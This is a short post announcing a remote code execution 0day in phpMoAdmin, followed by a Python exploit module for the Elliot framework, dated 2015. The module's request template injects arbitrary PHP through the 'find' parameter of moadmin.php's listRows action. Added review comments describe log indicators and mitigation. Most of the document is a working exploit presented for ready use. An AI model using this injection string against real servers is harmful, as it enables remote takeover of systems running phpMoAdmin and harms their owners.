phpMoAdmin 0day with D2 Elliot

We identified a remote code execution vulnerability in the latest version of phpMoAdmin. Exploitation is straightforward with Elliot. Here is the exploit code:


#
# Copyright DSquare Security, LLC, 2015
#

from core.templates.exploits import *


class MyExploit(xRCERegexp):
    """Elliot module descriptor for the phpMoAdmin (moadmin.php) command execution issue.

    The class is purely declarative: it sets an identifier, a metadata
    record and a request template. All request handling lives in the
    ``xRCERegexp`` base class from ``core.templates.exploits``, which is
    not shown here.
    """

    # Module identifier within the framework's catalogue.
    uid = "E-444"

    # Catalogue metadata. Key order matches the original literal.
    # NOTE(review): 'version', 'cve', 'vulnid' and 'references' are empty, so
    # this record does not say which phpMoAdmin releases are affected or which
    # advisory tracks the issue; defenders need to take that from the vendor.
    _extra_description = dict(
        name="phpMoAdmin RCE",
        creation="2015/03/03",
        lastupdate="2015/03/03",
        description="Remote command execution in phpMoAdmin (moadmin.php)",
        comment="",
        author=("",),
        vendor="phpMoAdmin",
        zeroday=True,
        published="2015/03/03",
        references=(),
        cve=(),
        vulnid=(),
        platform=Platform.All,
        application="phpMoAdmin",
        version=(),
        module="",
        requirements={},
        payload=Payload.PHP,
        family=Family.RCE,
        googledork="",
        stealth=Stealth.Stealth,
    )

    # Request template; <PAYLOAD> is presumably substituted by the base class.
    # The 'find' value is PHP source text rather than a query document, which
    # suggests moadmin.php evaluates that parameter as code (inferred from the
    # template, not shown here).
    # Detection: requests to moadmin.php with action=listRows whose 'find'
    # parameter carries statements after 'array()' are the indicator to look
    # for in web logs.
    # Mitigation: keep moadmin.php off untrusted networks and behind
    # authentication, or remove it where it is not needed.
    vuln_page_default = (
        "moadmin.php?action=listRows&collection=nothing"
        "&find=array();<PAYLOAD>;die()"
    )
